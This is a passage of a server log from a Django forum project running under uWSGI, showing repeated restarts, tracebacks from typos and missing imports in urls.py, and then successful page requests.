+ resolver_match = resolver.resolve(request.path_info)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/urls/resolvers.py", line 545, in resolve
+ for pattern in self.url_patterns:
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/utils/functional.py", line 48, in __get__
+ res = instance.__dict__[self.name] = self.func(instance)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/urls/resolvers.py", line 589, in url_patterns
+ patterns = getattr(self.urlconf_module, "urlpatterns", self.urlconf_module)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/utils/functional.py", line 48, in __get__
+ res = instance.__dict__[self.name] = self.func(instance)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/urls/resolvers.py", line 582, in urlconf_module
+ return import_module(self.urlconf_name)
+ File "/www/server/panel/pyenv/lib/python3.7/importlib/__init__.py", line 127, in import_module
+ return _bootstrap._gcd_import(name[level:], package, level)
+ File "", line 1006, in _gcd_import
+ File "", line 983, in _find_and_load
+ File "", line 967, in _find_and_load_unlocked
+ File "", line 677, in _load_unlocked
+ File "", line 728, in exec_module
+ File "", line 219, in _call_with_frames_removed
+ File "./ForumSystem/urls.py", line 35, in
+ ulr(r'^$',views.home),
+NameError: name 'ulr' is not defined
+[pid: 17338|app: 0|req: 5/5] 117.100.100.38 () {40 vars in 1354 bytes} [Fri Jan 8 13:31:05 2021] GET / => generated 111812 bytes in 38 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 0)
+Internal Server Error: /
+Traceback (most recent call last):
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 167, in _get_response
+ callback, callback_args, callback_kwargs = self.resolve_request(request)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 290, in resolve_request
+ resolver_match = resolver.resolve(request.path_info)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/urls/resolvers.py", line 545, in resolve
+ for pattern in self.url_patterns:
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/utils/functional.py", line 48, in __get__
+ res = instance.__dict__[self.name] = self.func(instance)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/urls/resolvers.py", line 589, in url_patterns
+ patterns = getattr(self.urlconf_module, "urlpatterns", self.urlconf_module)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/utils/functional.py", line 48, in __get__
+ res = instance.__dict__[self.name] = self.func(instance)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/urls/resolvers.py", line 582, in urlconf_module
+ return import_module(self.urlconf_name)
+ File "/www/server/panel/pyenv/lib/python3.7/importlib/__init__.py", line 127, in import_module
+ return _bootstrap._gcd_import(name[level:], package, level)
+ File "", line 1006, in _gcd_import
+ File "", line 983, in _find_and_load
+ File "", line 967, in _find_and_load_unlocked
+ File "", line 677, in _load_unlocked
+ File "", line 728, in exec_module
+ File "", line 219, in _call_with_frames_removed
+ File "./ForumSystem/urls.py", line 35, in
+ ulr(r'^$',views.home),
+NameError: name 'ulr' is not defined
+[pid: 17338|app: 0|req: 6/6] 117.100.100.38 () {40 vars in 1354 bytes} [Fri Jan 8 13:31:05 2021] GET / => generated 111812 bytes in 37 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 1)
+Fri Jan 8 13:32:51 2021 - uWSGI worker 1 screams: UAAAAAAH my master disconnected: i will kill myself !!!
+Fri Jan 8 13:32:51 2021 - uWSGI worker 1 screams: UAAAAAAH my master disconnected: i will kill myself !!!
+*** Starting uWSGI 2.0.19.1 (64bit) on [Fri Jan 8 21:32:53 2021] ***
+compiled with version: 4.8.5 20150623 (Red Hat 4.8.5-44) on 08 January 2021 13:09:04
+os: Linux-3.10.0-1127.19.1.el7.x86_64 #1 SMP Tue Aug 25 17:23:54 UTC 2020
+nodename: VM-0-13-centos
+machine: x86_64
+clock source: unix
+pcre jit disabled
+detected number of CPU cores: 1
+current working directory: /
+detected binary path: /www/wwwroot/master/master_venv/bin/uwsgi
+uWSGI running as root, you can use --uid/--gid/--chroot options
+*** WARNING: you are running uWSGI as root !!! (use the --uid flag) ***
+chdir() to /www/wwwroot/master
+your processes number limit is 7269
+your memory page size is 4096 bytes
+detected max file descriptor number: 1024
+!!! no /etc/mime.types file found !!!
+lock engine: pthread robust mutexes
+thunder lock: disabled (you can enable it with --thunder-lock)
+uWSGI http bound on 0.0.0.0:8080 fd 4
+uwsgi socket 0 bound to TCP address 127.0.0.1:33873 (port auto-assigned) fd 3
+uWSGI running as root, you can use --uid/--gid/--chroot options
+*** WARNING: you are running uWSGI as root !!! (use the --uid flag) ***
+Python version: 3.7.8 (default, Jul 6 2020, 09:48:19) [GCC 4.8.5 20150623 (Red Hat 4.8.5-39)]
+Python main interpreter initialized at 0x21909c0
+uWSGI running as root, you can use --uid/--gid/--chroot options
+*** WARNING: you are running uWSGI as root !!! (use the --uid flag) ***
+python threads support enabled
+your server socket listen backlog is limited to 100 connections
+your mercy for graceful operations on workers is 60 seconds
+mapped 166752 bytes (162 KB) for 2 cores
+*** Operational MODE: threaded ***
+ModuleNotFoundError: No module named 'master'
+unable to load app 0 (mountpoint='') (callable not found or import error)
+WSGI app 0 (mountpoint='') ready in 0 seconds on interpreter 0x21909c0 pid: 17684 (default app)
+uWSGI running as root, you can use --uid/--gid/--chroot options
+*** WARNING: you are running uWSGI as root !!! (use the --uid flag) ***
+*** uWSGI is running in multiple interpreter mode ***
+spawned uWSGI master process (pid: 17684)
+spawned uWSGI worker 1 (pid: 17685, cores: 2)
+spawned uWSGI http 1 (pid: 17686)
+Internal Server Error: /
+Traceback (most recent call last):
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 167, in _get_response
+ callback, callback_args, callback_kwargs = self.resolve_request(request)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 290, in resolve_request
+ resolver_match = resolver.resolve(request.path_info)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/urls/resolvers.py", line 545, in resolve
+ for pattern in self.url_patterns:
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/utils/functional.py", line 48, in __get__
+ res = instance.__dict__[self.name] = self.func(instance)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/urls/resolvers.py", line 589, in url_patterns
+ patterns = getattr(self.urlconf_module, "urlpatterns", self.urlconf_module)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/utils/functional.py", line 48, in __get__
+ res = instance.__dict__[self.name] = self.func(instance)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/urls/resolvers.py", line 582, in urlconf_module
+ return import_module(self.urlconf_name)
+ File "/www/server/panel/pyenv/lib/python3.7/importlib/__init__.py", line 127, in import_module
+ return _bootstrap._gcd_import(name[level:], package, level)
+ File "", line 1006, in _gcd_import
+ File "", line 983, in _find_and_load
+ File "", line 967, in _find_and_load_unlocked
+ File "", line 677, in _load_unlocked
+ File "", line 728, in exec_module
+ File "", line 219, in _call_with_frames_removed
+ File "./ForumSystem/urls.py", line 35, in
+ ulr(r'^\d+$',views.home),
+NameError: name 'ulr' is not defined
+[pid: 17685|app: 0|req: 1/1] 117.100.100.38 () {40 vars in 1355 bytes} [Fri Jan 8 13:32:57 2021] GET / => generated 111819 bytes in 78 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 0)
+Internal Server Error: /
+Traceback (most recent call last):
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 167, in _get_response
+ callback, callback_args, callback_kwargs = self.resolve_request(request)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 290, in resolve_request
+ resolver_match = resolver.resolve(request.path_info)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/urls/resolvers.py", line 545, in resolve
+ for pattern in self.url_patterns:
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/utils/functional.py", line 48, in __get__
+ res = instance.__dict__[self.name] = self.func(instance)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/urls/resolvers.py", line 589, in url_patterns
+ patterns = getattr(self.urlconf_module, "urlpatterns", self.urlconf_module)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/utils/functional.py", line 48, in __get__
+ res = instance.__dict__[self.name] = self.func(instance)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/urls/resolvers.py", line 582, in urlconf_module
+ return import_module(self.urlconf_name)
+ File "/www/server/panel/pyenv/lib/python3.7/importlib/__init__.py", line 127, in import_module
+ return _bootstrap._gcd_import(name[level:], package, level)
+ File "", line 1006, in _gcd_import
+ File "", line 983, in _find_and_load
+ File "", line 967, in _find_and_load_unlocked
+ File "", line 677, in _load_unlocked
+ File "", line 728, in exec_module
+ File "", line 219, in _call_with_frames_removed
+ File "./ForumSystem/urls.py", line 35, in
+ ulr(r'^\d+$',views.home),
+NameError: name 'ulr' is not defined
+[pid: 17685|app: 0|req: 2/2] 117.100.100.38 () {40 vars in 1355 bytes} [Fri Jan 8 13:32:59 2021] GET / => generated 111819 bytes in 40 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 1)
+Internal Server Error: /
+Traceback (most recent call last):
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 167, in _get_response
+ callback, callback_args, callback_kwargs = self.resolve_request(request)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 290, in resolve_request
+ resolver_match = resolver.resolve(request.path_info)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/urls/resolvers.py", line 545, in resolve
+ for pattern in self.url_patterns:
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/utils/functional.py", line 48, in __get__
+ res = instance.__dict__[self.name] = self.func(instance)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/urls/resolvers.py", line 589, in url_patterns
+ patterns = getattr(self.urlconf_module, "urlpatterns", self.urlconf_module)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/utils/functional.py", line 48, in __get__
+ res = instance.__dict__[self.name] = self.func(instance)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/urls/resolvers.py", line 582, in urlconf_module
+ return import_module(self.urlconf_name)
+ File "/www/server/panel/pyenv/lib/python3.7/importlib/__init__.py", line 127, in import_module
+ return _bootstrap._gcd_import(name[level:], package, level)
+ File "", line 1006, in _gcd_import
+ File "", line 983, in _find_and_load
+ File "", line 967, in _find_and_load_unlocked
+ File "", line 677, in _load_unlocked
+ File "", line 728, in exec_module
+ File "", line 219, in _call_with_frames_removed
+ File "./ForumSystem/urls.py", line 35, in
+ ulr(r'^\d+$',views.home),
+NameError: name 'ulr' is not defined
+[pid: 17685|app: 0|req: 3/3] 117.100.100.38 () {40 vars in 1355 bytes} [Fri Jan 8 13:32:59 2021] GET / => generated 111819 bytes in 39 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 0)
+Internal Server Error: /
+Traceback (most recent call last):
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 167, in _get_response
+ callback, callback_args, callback_kwargs = self.resolve_request(request)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 290, in resolve_request
+ resolver_match = resolver.resolve(request.path_info)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/urls/resolvers.py", line 545, in resolve
+ for pattern in self.url_patterns:
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/utils/functional.py", line 48, in __get__
+ res = instance.__dict__[self.name] = self.func(instance)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/urls/resolvers.py", line 589, in url_patterns
+ patterns = getattr(self.urlconf_module, "urlpatterns", self.urlconf_module)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/utils/functional.py", line 48, in __get__
+ res = instance.__dict__[self.name] = self.func(instance)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/urls/resolvers.py", line 582, in urlconf_module
+ return import_module(self.urlconf_name)
+ File "/www/server/panel/pyenv/lib/python3.7/importlib/__init__.py", line 127, in import_module
+ return _bootstrap._gcd_import(name[level:], package, level)
+ File "", line 1006, in _gcd_import
+ File "", line 983, in _find_and_load
+ File "", line 967, in _find_and_load_unlocked
+ File "", line 677, in _load_unlocked
+ File "", line 728, in exec_module
+ File "", line 219, in _call_with_frames_removed
+ File "./ForumSystem/urls.py", line 35, in
+ ulr(r'^\d+$',views.home),
+NameError: name 'ulr' is not defined
+[pid: 17685|app: 0|req: 4/4] 117.100.100.38 () {40 vars in 1355 bytes} [Fri Jan 8 13:33:00 2021] GET / => generated 111819 bytes in 38 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 1)
+Fri Jan 8 13:34:46 2021 - uWSGI worker 1 screams: UAAAAAAH my master disconnected: i will kill myself !!!
+Fri Jan 8 13:34:46 2021 - uWSGI worker 1 screams: UAAAAAAH my master disconnected: i will kill myself !!!
+*** Starting uWSGI 2.0.19.1 (64bit) on [Fri Jan 8 21:34:47 2021] ***
+compiled with version: 4.8.5 20150623 (Red Hat 4.8.5-44) on 08 January 2021 13:09:04
+os: Linux-3.10.0-1127.19.1.el7.x86_64 #1 SMP Tue Aug 25 17:23:54 UTC 2020
+nodename: VM-0-13-centos
+machine: x86_64
+clock source: unix
+pcre jit disabled
+detected number of CPU cores: 1
+current working directory: /
+detected binary path: /www/wwwroot/master/master_venv/bin/uwsgi
+uWSGI running as root, you can use --uid/--gid/--chroot options
+*** WARNING: you are running uWSGI as root !!! (use the --uid flag) ***
+chdir() to /www/wwwroot/master
+your processes number limit is 7269
+your memory page size is 4096 bytes
+detected max file descriptor number: 1024
+!!! no /etc/mime.types file found !!!
+lock engine: pthread robust mutexes
+thunder lock: disabled (you can enable it with --thunder-lock)
+uWSGI http bound on 0.0.0.0:8080 fd 4
+uwsgi socket 0 bound to TCP address 127.0.0.1:39268 (port auto-assigned) fd 3
+uWSGI running as root, you can use --uid/--gid/--chroot options
+*** WARNING: you are running uWSGI as root !!! (use the --uid flag) ***
+Python version: 3.7.8 (default, Jul 6 2020, 09:48:19) [GCC 4.8.5 20150623 (Red Hat 4.8.5-39)]
+Python main interpreter initialized at 0x137d9c0
+uWSGI running as root, you can use --uid/--gid/--chroot options
+*** WARNING: you are running uWSGI as root !!! (use the --uid flag) ***
+python threads support enabled
+your server socket listen backlog is limited to 100 connections
+your mercy for graceful operations on workers is 60 seconds
+mapped 166752 bytes (162 KB) for 2 cores
+*** Operational MODE: threaded ***
+ModuleNotFoundError: No module named 'master'
+unable to load app 0 (mountpoint='') (callable not found or import error)
+WSGI app 0 (mountpoint='') ready in 1 seconds on interpreter 0x137d9c0 pid: 18031 (default app)
+uWSGI running as root, you can use --uid/--gid/--chroot options
+*** WARNING: you are running uWSGI as root !!! (use the --uid flag) ***
+*** uWSGI is running in multiple interpreter mode ***
+spawned uWSGI master process (pid: 18031)
+spawned uWSGI worker 1 (pid: 18032, cores: 2)
+spawned uWSGI http 1 (pid: 18033)
+Internal Server Error: /
+Traceback (most recent call last):
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 167, in _get_response
+ callback, callback_args, callback_kwargs = self.resolve_request(request)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 290, in resolve_request
+ resolver_match = resolver.resolve(request.path_info)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/urls/resolvers.py", line 545, in resolve
+ for pattern in self.url_patterns:
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/utils/functional.py", line 48, in __get__
+ res = instance.__dict__[self.name] = self.func(instance)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/urls/resolvers.py", line 589, in url_patterns
+ patterns = getattr(self.urlconf_module, "urlpatterns", self.urlconf_module)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/utils/functional.py", line 48, in __get__
+ res = instance.__dict__[self.name] = self.func(instance)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/urls/resolvers.py", line 582, in urlconf_module
+ return import_module(self.urlconf_name)
+ File "/www/server/panel/pyenv/lib/python3.7/importlib/__init__.py", line 127, in import_module
+ return _bootstrap._gcd_import(name[level:], package, level)
+ File "", line 1006, in _gcd_import
+ File "", line 983, in _find_and_load
+ File "", line 967, in _find_and_load_unlocked
+ File "", line 677, in _load_unlocked
+ File "", line 728, in exec_module
+ File "", line 219, in _call_with_frames_removed
+ File "./ForumSystem/urls.py", line 35, in
+ re_path(r'^$',views.index),
+NameError: name 're_path' is not defined
+[pid: 18032|app: 0|req: 1/1] 117.100.100.38 () {40 vars in 1355 bytes} [Fri Jan 8 13:34:56 2021] GET / => generated 111839 bytes in 81 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 0)
+Internal Server Error: /
+Traceback (most recent call last):
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 167, in _get_response
+ callback, callback_args, callback_kwargs = self.resolve_request(request)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 290, in resolve_request
+ resolver_match = resolver.resolve(request.path_info)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/urls/resolvers.py", line 545, in resolve
+ for pattern in self.url_patterns:
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/utils/functional.py", line 48, in __get__
+ res = instance.__dict__[self.name] = self.func(instance)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/urls/resolvers.py", line 589, in url_patterns
+ patterns = getattr(self.urlconf_module, "urlpatterns", self.urlconf_module)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/utils/functional.py", line 48, in __get__
+ res = instance.__dict__[self.name] = self.func(instance)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/urls/resolvers.py", line 582, in urlconf_module
+ return import_module(self.urlconf_name)
+ File "/www/server/panel/pyenv/lib/python3.7/importlib/__init__.py", line 127, in import_module
+ return _bootstrap._gcd_import(name[level:], package, level)
+ File "", line 1006, in _gcd_import
+ File "", line 983, in _find_and_load
+ File "", line 967, in _find_and_load_unlocked
+ File "", line 677, in _load_unlocked
+ File "", line 728, in exec_module
+ File "", line 219, in _call_with_frames_removed
+ File "./ForumSystem/urls.py", line 35, in
+ re_path(r'^$',views.index),
+NameError: name 're_path' is not defined
+[pid: 18032|app: 0|req: 2/2] 117.100.100.38 () {40 vars in 1355 bytes} [Fri Jan 8 13:34:57 2021] GET / => generated 111839 bytes in 39 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 1)
+Internal Server Error: /
+Traceback (most recent call last):
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 167, in _get_response
+ callback, callback_args, callback_kwargs = self.resolve_request(request)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 290, in resolve_request
+ resolver_match = resolver.resolve(request.path_info)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/urls/resolvers.py", line 545, in resolve
+ for pattern in self.url_patterns:
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/utils/functional.py", line 48, in __get__
+ res = instance.__dict__[self.name] = self.func(instance)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/urls/resolvers.py", line 589, in url_patterns
+ patterns = getattr(self.urlconf_module, "urlpatterns", self.urlconf_module)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/utils/functional.py", line 48, in __get__
+ res = instance.__dict__[self.name] = self.func(instance)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/urls/resolvers.py", line 582, in urlconf_module
+ return import_module(self.urlconf_name)
+ File "/www/server/panel/pyenv/lib/python3.7/importlib/__init__.py", line 127, in import_module
+ return _bootstrap._gcd_import(name[level:], package, level)
+ File "", line 1006, in _gcd_import
+ File "", line 983, in _find_and_load
+ File "", line 967, in _find_and_load_unlocked
+ File "", line 677, in _load_unlocked
+ File "", line 728, in exec_module
+ File "", line 219, in _call_with_frames_removed
+ File "./ForumSystem/urls.py", line 35, in
+ re_path(r'^$',views.index),
+NameError: name 're_path' is not defined
+[pid: 18032|app: 0|req: 3/3] 117.100.100.38 () {38 vars in 1324 bytes} [Fri Jan 8 13:35:02 2021] GET / => generated 111702 bytes in 40 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 0)
+Fri Jan 8 13:35:49 2021 - uWSGI worker 1 screams: UAAAAAAH my master disconnected: i will kill myself !!!
+Fri Jan 8 13:35:49 2021 - uWSGI worker 1 screams: UAAAAAAH my master disconnected: i will kill myself !!!
+*** Starting uWSGI 2.0.19.1 (64bit) on [Fri Jan 8 21:35:50 2021] ***
+compiled with version: 4.8.5 20150623 (Red Hat 4.8.5-44) on 08 January 2021 13:09:04
+os: Linux-3.10.0-1127.19.1.el7.x86_64 #1 SMP Tue Aug 25 17:23:54 UTC 2020
+nodename: VM-0-13-centos
+machine: x86_64
+clock source: unix
+pcre jit disabled
+detected number of CPU cores: 1
+current working directory: /
+detected binary path: /www/wwwroot/master/master_venv/bin/uwsgi
+uWSGI running as root, you can use --uid/--gid/--chroot options
+*** WARNING: you are running uWSGI as root !!! (use the --uid flag) ***
+chdir() to /www/wwwroot/master
+your processes number limit is 7269
+your memory page size is 4096 bytes
+detected max file descriptor number: 1024
+!!! no /etc/mime.types file found !!!
+lock engine: pthread robust mutexes
+thunder lock: disabled (you can enable it with --thunder-lock)
+uWSGI http bound on 0.0.0.0:8080 fd 4
+uwsgi socket 0 bound to TCP address 127.0.0.1:34741 (port auto-assigned) fd 3
+uWSGI running as root, you can use --uid/--gid/--chroot options
+*** WARNING: you are running uWSGI as root !!! (use the --uid flag) ***
+Python version: 3.7.8 (default, Jul 6 2020, 09:48:19) [GCC 4.8.5 20150623 (Red Hat 4.8.5-39)]
+Python main interpreter initialized at 0x2a1d9c0
+uWSGI running as root, you can use --uid/--gid/--chroot options
+*** WARNING: you are running uWSGI as root !!! (use the --uid flag) ***
+python threads support enabled
+your server socket listen backlog is limited to 100 connections
+your mercy for graceful operations on workers is 60 seconds
+mapped 166752 bytes (162 KB) for 2 cores
+*** Operational MODE: threaded ***
+ModuleNotFoundError: No module named 'master'
+unable to load app 0 (mountpoint='') (callable not found or import error)
+WSGI app 0 (mountpoint='') ready in 0 seconds on interpreter 0x2a1d9c0 pid: 18256 (default app)
+uWSGI running as root, you can use --uid/--gid/--chroot options
+*** WARNING: you are running uWSGI as root !!! (use the --uid flag) ***
+*** uWSGI is running in multiple interpreter mode ***
+spawned uWSGI master process (pid: 18256)
+spawned uWSGI worker 1 (pid: 18257, cores: 2)
+spawned uWSGI http 1 (pid: 18258)
+[pid: 18257|app: 0|req: 1/1] 117.100.100.38 () {40 vars in 1354 bytes} [Fri Jan 8 13:35:55 2021] GET / => generated 6416 bytes in 41 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 18257|app: 0|req: 2/2] 117.100.100.38 () {40 vars in 1354 bytes} [Fri Jan 8 13:35:58 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 18257|app: 0|req: 3/3] 117.100.100.38 () {40 vars in 1354 bytes} [Fri Jan 8 13:35:59 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 18257|app: 0|req: 4/4] 117.100.100.38 () {40 vars in 1354 bytes} [Fri Jan 8 13:36:00 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+Fri Jan 8 13:36:17 2021 - uWSGI worker 1 screams: UAAAAAAH my master disconnected: i will kill myself !!!
+Fri Jan 8 13:36:17 2021 - uWSGI worker 1 screams: UAAAAAAH my master disconnected: i will kill myself !!!
+*** Starting uWSGI 2.0.19.1 (64bit) on [Fri Jan 8 21:36:19 2021] ***
+compiled with version: 4.8.5 20150623 (Red Hat 4.8.5-44) on 08 January 2021 13:09:04
+os: Linux-3.10.0-1127.19.1.el7.x86_64 #1 SMP Tue Aug 25 17:23:54 UTC 2020
+nodename: VM-0-13-centos
+machine: x86_64
+clock source: unix
+pcre jit disabled
+detected number of CPU cores: 1
+current working directory: /
+detected binary path: /www/wwwroot/master/master_venv/bin/uwsgi
+uWSGI running as root, you can use --uid/--gid/--chroot options
+*** WARNING: you are running uWSGI as root !!! (use the --uid flag) ***
+chdir() to /www/wwwroot/master
+your processes number limit is 7269
+your memory page size is 4096 bytes
+detected max file descriptor number: 1024
+!!! no /etc/mime.types file found !!!
+lock engine: pthread robust mutexes
+thunder lock: disabled (you can enable it with --thunder-lock)
+uWSGI http bound on 0.0.0.0:8080 fd 4
+uwsgi socket 0 bound to TCP address 127.0.0.1:33840 (port auto-assigned) fd 3
+uWSGI running as root, you can use --uid/--gid/--chroot options
+*** WARNING: you are running uWSGI as root !!! (use the --uid flag) ***
+Python version: 3.7.8 (default, Jul 6 2020, 09:48:19) [GCC 4.8.5 20150623 (Red Hat 4.8.5-39)]
+Python main interpreter initialized at 0x10529c0
+uWSGI running as root, you can use --uid/--gid/--chroot options
+*** WARNING: you are running uWSGI as root !!! (use the --uid flag) ***
+python threads support enabled
+your server socket listen backlog is limited to 100 connections
+your mercy for graceful operations on workers is 60 seconds
+mapped 166752 bytes (162 KB) for 2 cores
+*** Operational MODE: threaded ***
+ModuleNotFoundError: No module named 'master'
+unable to load app 0 (mountpoint='') (callable not found or import error)
+WSGI app 0 (mountpoint='') ready in 0 seconds on interpreter 0x10529c0 pid: 18394 (default app)
+uWSGI running as root, you can use --uid/--gid/--chroot options
+*** WARNING: you are running uWSGI as root !!! (use the --uid flag) ***
+*** uWSGI is running in multiple interpreter mode ***
+spawned uWSGI master process (pid: 18394)
+spawned uWSGI worker 1 (pid: 18395, cores: 2)
+spawned uWSGI http 1 (pid: 18396)
+[pid: 18395|app: 0|req: 1/1] 117.100.100.38 () {40 vars in 1355 bytes} [Fri Jan 8 13:36:24 2021] GET / => generated 7795 bytes in 51 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 0)
+[pid: 18395|app: 0|req: 2/2] 117.100.100.38 () {40 vars in 1355 bytes} [Fri Jan 8 13:36:26 2021] GET / => generated 7795 bytes in 7 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 1)
+[pid: 18395|app: 0|req: 3/3] 117.100.100.38 () {40 vars in 1355 bytes} [Fri Jan 8 13:36:27 2021] GET / => generated 7795 bytes in 7 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 0)
+[pid: 18395|app: 0|req: 4/4] 117.100.100.38 () {40 vars in 1355 bytes} [Fri Jan 8 13:36:28 2021] GET / => generated 7795 bytes in 6 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 1)
+[pid: 18395|app: 0|req: 5/5] 117.100.100.38 () {40 vars in 1355 bytes} [Fri Jan 8 13:36:28 2021] GET / => generated 7795 bytes in 6 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 0)
+[pid: 18395|app: 0|req: 6/6] 117.100.100.38 () {40 vars in 1355 bytes} [Fri Jan 8 13:36:29 2021] GET / => generated 7795 bytes in 6 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 1)
+[pid: 18395|app: 0|req: 7/7] 117.100.100.38 () {40 vars in 1355 bytes} [Fri Jan 8 13:36:29 2021] GET / => generated 7795 bytes in 7 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 0)
+[pid: 18395|app: 0|req: 8/8] 117.100.100.38 () {40 vars in 1382 bytes} [Fri Jan 8 13:36:30 2021] GET /publish/ => generated 4909 bytes in 3 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+sfdfd ewewew
+Internal Server Error: /publish/
+Traceback (most recent call last):
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
